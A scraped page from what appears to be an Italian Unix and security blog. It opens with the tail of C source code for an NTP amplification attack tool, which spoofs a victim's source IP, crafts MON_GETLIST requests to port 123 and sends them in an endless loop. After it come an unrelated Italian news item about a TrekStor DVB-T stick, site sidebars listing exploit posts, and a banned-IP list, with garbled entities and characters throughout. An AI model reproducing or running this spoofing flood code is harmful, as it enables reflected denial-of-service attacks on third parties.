ip- gt;saddr = inet_addr( argv[1] ); // Source ip ( spoofing goes here)
ip- gt;daddr = inet_addr( argv[2] ); // Destination IP
// Fills the UDP Header
udp- gt;udp_sourcePortNumber = htons( atoi( quot;123 quot; ) ); // Source Port
udp- gt;udp_destinationPortNumber = htons(atoi( quot;123 quot;)) ; // Destination Port
udp- gt;udp_length = htons( sizeof(struct udpheader) + sizeof(struct ntpreqheader) ); // Length of the packet
udp- gt;udp_checksum = 0; // Checksum
// Calculate the checksums
ip- gt;check = csum((unsigned short *)packet, ip- gt;tot_len); // Calculate the checksum for iP header
// Sets the destination data
dest.sin_family = AF_INET; // Address Family Ipv4
dest.sin_port = htons (atoi( quot;123 quot; ) ) ; // Destination port
dest.sin_addr.s_addr = inet_addr( argv[2] ); // Destination Endere莽o para onde se quer enviar o pacote
// Fills the NTP header
// Ok, here is the magic, we need to send a request ntp packet with the modes and codes sets for only MON_GETLIST
// To do this we can import the ntp_types.h and use its structures and macros. To simplify i've created a simple version of the
// ntp request packet and hardcoded the values for the fields to make a quot;MON_GETLIST quot; request packet.
// To learn more, read this: http://searchcode.com/codesearch/view/451164#127
ntp- gt;rm_vn_mode=0x27; // Sets the response bit to 0, More bit to 0,
// Version field to 4, Mode field to 7 Private
ntp- gt;implementation=0x03; // Sets the implementation to 3 (XNTPD)
ntp- gt;request=0x2a; // Sets the request field to 42 ( MON_GETLIST_1 )
//All the other fields of the struct are zeroed
// Create a socket and tells the kernel that we want to use udp as layer 4 protocol
if ((sockfd = socket(PF_INET, SOCK_RAW, IPPROTO_UDP)) lt; 0){
perror( quot; [-] Error quot;);
exit(1);
}
if ((connect(sockfd,(const struct sockaddr *) amp;dest,sizeof(dest))) lt; 0){
perror( quot; [-] Error quot;);
close(sockfd);
exit(1);
}
// Sets the option IP_HDRINCL
if (setsockopt(sockfd, IPPROTO_IP, IP_HDRINCL, amp;one, sizeof(one)) lt; 0){
perror( quot; [-] Error quot;);
exit(1);
}
// Sends the packets
printf( quot; [+] sending ntp query src: %s - gt; dst: %s\n quot;, argv[1], argv[2]);
while(1){
if ( sendto(sockfd, packet, ip- gt;tot_len, 0, (struct sockaddr *) amp;dest, sizeof(dest) lt; 0), sleep(2)){
perror( quot; [-] Error quot;);
exit(1);
}
}
}
(451)
Inserito in: EXPLOIT, REMOTE
Nessun commento
3May/140
Da TrekStor il nuovo stick DVB-T per tablet e smartphone Android
Dedicato a tutti coloro che non vogliono rinunciare all鈥檌ntrattenimento in mobilit脿, TrekStor lancia sul mercato il nuovo DVB-T Stick Terres droid, grazie al quale 猫 possibile trasformare lo smartphone o il tablet Android鈩 in una comoda TV portatile.
In treno o in metropolitana, al parco durante un picnic o sul luogo di lavoro, non importa dove vi troviate: basta collegare lo stick TrekStor Terres droid al dispositivo mobile Android鈩 per ricevere tutti i canali TV.
tecno_trekstorterresdroid2Terres droid 猫 progettato per godere dell鈥檌ntrattenimento portatile con tutta la semplicit脿 di un funzionamento semplice ed intuitivo: dopo aver impostato il tablet con l'App gratuita AirDTV (disponibile su www.trekstor.de e tramite Google Play) e collegato lo stick USB al tablet , 猫 sufficiente inserire l'antenna esterna in dotazione, per un intrattenimento mobile o, se disponibile, la classica presa domestica (MCX adapter).
Al primo utilizzo sar脿 necessario eseguire solo la ricerca automatica di canali e鈥l gioco 猫 fatto: ora potrete godervi le vostre trasmissioni preferite e perfino registrarle!
Realizzato con un design sobrio e discreto, Terres droid 猫 un dispositivo talmente leggero (pesa solo 5 grammi) e piccolo (misura appena 4 centimetri) da risultare facilmente trasportabile all'interno delle custodie dei tablet, ma anche in borsa e persino in tasca.
La comoda funzione recorder offre in pi霉 tutta la libert脿 di poter decidere autonomamente quando guardare le trasmissioni preferite, indipendentemente dagli orari della programmazione TV. L鈥檌mpostazione della registrazione 猫 davvero semplice ed 猫 possibile effettuarla, in pochi semplici passaggi, sia manualmente sia utilizzando la guida alla programmazione elettronica (EPG) che tiene aggiornati sulla programmazione corrente e fornisce sommari e informazioni di background.
In questo modo 猫 possibile avere sempre a disposizione una panoramica sull'intera programmazione delle settimane successive.
DVB-T Stick Terres droid 猫 un accessorio per dispositivi Android鈩 ed 猫 compatibile con tutti i tablet TrekStor SurfTabs e tutti i tablet o smartphone dotati di porta USB con funzione 鈥渉ost鈥!
Per maggiori informazioni: www.trekstor.it
Specs TrekStor DVB-T Stick Terres droid:
Interfaccia: 1 x Micro-USB 2.0 , Presa coassiale per antenna DVB-T esterna o presa domestica (MCX adapter)
Dimensioni (L x A x P): 29 mm x 28 mm x 9 mm
Peso: circa 5 g (solo apparecchio/senza accessori)
Materiale alloggiamento: Plastica
Colore: Nero
Input: 75 Ohm DIN
Requisiti di sistema per il software
Software: AirDTV App (disponibile su www.trekstor.de e tramite Google Play)
Lingue: Tedesco, Inglese, Italiano, Spagnolo, Francese, Polacco
Contenuto della confezione: DBV-T Stick Terres droid, Antenna con supporto magnetico, Adattatore MCX, Antenna telescopica, Istruzioni per l'uso
Adatto a tutti i SurfTab da TrekStor e per le tavolette Android con sistema operativo Android 4.0 o superiore, con connettore Micro-USB host (OTG) e di un processore o RK30 RK31 da Rockchip e Boxchip A13 o processore dual-core AMLogic.
FONTE : http://tecnologia.tiscali.it/articoli/news/elettronica-di-consumo/14/04/trekstor-dvb-t-stick-terres-droid-tv-portatile-android.html?news_elettronica
(606)
Tag: AMLOGIC, ANDROID, COMPUTER, DVB-T, HI-TECH, HTC, LINUX, MCX ADAPTER, MOVIE, MUSIC, NEWS, PORTATILE, SMARTPHONE, SOFTWARE, TABLET, TELEVISIONE, TERRES DROID, TREKSTOR, TV, UNIX, VIDEO
Nessun commento
Precedenti raquo;
MondoUnix ADV
Segui MondoUnix MondoUnix on Facebook
Categorie
APACHE (11)
BASH (16)
CENTOS (22)
DATABASE (8)
DEBIAN (6)
DRUPAL (20)
ESX (7)
ESXI (11)
EXPLOIT (1219)
FEDORA (21)
FREEBSD (67)
HI-TECH NEWS (55)
HOWTO (187)
IPTABLES (8)
IPV6 (9)
JOOMLA (89)
LINUX (362)
LOCAL (83)
MYSQL (5)
NETBSD (11)
NETWORKING (87)
OFF TOPICS (3)
OPENBSD (9)
OPENINDIANA (6)
OPENSOLARIS (7)
PERL (7)
PF (1)
PHP (134)
PROGRAMMAZIONE (18)
PROXMOX (2)
PYTHON (6)
QEMU (2)
REMOTE (115)
RHEL (21)
SCIENTIFIC LINUX (11)
SICUREZZA (1184)
SISTEMI OPERATIVI (34)
SOFTWARE (136)
SWITCH (1)
UBUNTU (12)
Uncategorized (1)
UNIX (431)
VIRTUALIZZAZIONE (18)
WEB (19)
WEBAPPS (985)
WORDPRESS (1)
WORDPRESS HOWTO (3)
WORDPRESS SECURITY (366)
Articoli recenti
WordPress Booking System SQL Injection
WordPress Simple Popup Cross Site Scripting
WordPress cnhk-slideshow Shell Upload
Drupal Flag 7.x-3.5 Command Execution
WordPress Bonuspressx Cross Site Scripting
Offiria Cross-Site Scripting XSS
WordPress Photo-Gallery Cross Site Request Forgery
WordPress multiple vulnerabilities Flexolio theme
Meta
Register Log in
Entries RSS
Comments RSS
WordPress.org
Utility e Tool
Convertitore da data a unix timestamp
Drupal security
Elenco ip bloccati
Elenco ip bloccati ipfw
Elenco ip bloccati iptables
Elenco subnet bloccate
Exploit database
Ipv4 Network tools
Ipv4 to Ipv6 calculator
Ipv6 Network tools
Ipv6 Reverse ip tool
Joomla Security
Mappa del sito
WordPress Security
Archivio
May 2014 (15)
April 2014 (18)
March 2014 (16)
February 2014 (22)
January 2014 (30)
December 2013 (41)
November 2013 (27)
October 2013 (23)
September 2013 (36)
August 2013 (36)
July 2013 (19)
June 2013 (43)
May 2013 (73)
April 2013 (37)
March 2013 (52)
February 2013 (67)
January 2013 (77)
December 2012 (50)
November 2012 (70)
October 2012 (82)
September 2012 (70)
August 2012 (89)
July 2012 (81)
June 2012 (228)
May 2012 (100)
April 2012 (39)
March 2012 (53)
February 2012 (67)
Tag Cloud0DAY
ARBITRARY FILE UPLOAD
ARBITRARY SHELL UPLOAD
CMS
COMPONENT
CROSS SITE REQUEST FORGERY
CROSS SITE SCRIPTING
CSRF
DENIAL OF SERVICE
DOS
EXPLOIT
FREEBSD
HI-TECH
HOWTO
JOOMLA
LINUX
LOCAL
METASPLOIT
NETWORK
NETWORKING
NEWS
NOTIZIA
PHP
PLUGIN
PLUGINS
POC
PROOF OF CONCEPT
REMOTE
RETE
SCRIPT
SECURITY
SHELL
SHELL UPLOAD
SICUREZZA
SOFTWARE
SQL-I
SQL INJECTION
UNIX
VULNERABILITIES
VULNERABILITY
WEBAPPS
WORDPRESS
WORDPRESS SECURITY
WP-CONTENT
XSS
IPv6 Certified
Latest banned ip 66.33.212.11125/05/2014WEB174.36.33.625/05/2014WEB69.163.224.12925/05/2014WEB82.168.111.14625/05/2014WEB122.226.95.16625/05/2014SSH91.208.16.325/05/2014WEB66.33.212.12925/05/2014WEB187.45.210.6825/05/2014WEB84.18.112.8725/05/2014WEB1.93.30.22325/05/2014SSHElenco completo
IPv4 Exhaustion Counter
Valid XHTML and Feed
Blog Link
Computers blogs
Blog Directory Top Blog Sites
Blogs Blog Tools Promote Blog
Add blog to our directory.
Alexa Ranking
BlogUPP
Copyright copy; 2014 MondoUnix middot; Powered by WordPress
Torna in cima uarr;

Updated Time

Updating   
Friend links: ProxyFire    More...
Site Map 1 2 3 4 5 6 7 8 9 10 20 30 40 50 60 70 80 90 100 110 120 130 140 150 160 170 180 190 200 250 300 350 400 450 500 550 600 610 620 630 640 650 660 670 680 690 700 710 720 730 740 750
TOS | Contact us
© 2009 MyIP.cn Dev by MYIP Elapsed:63.358ms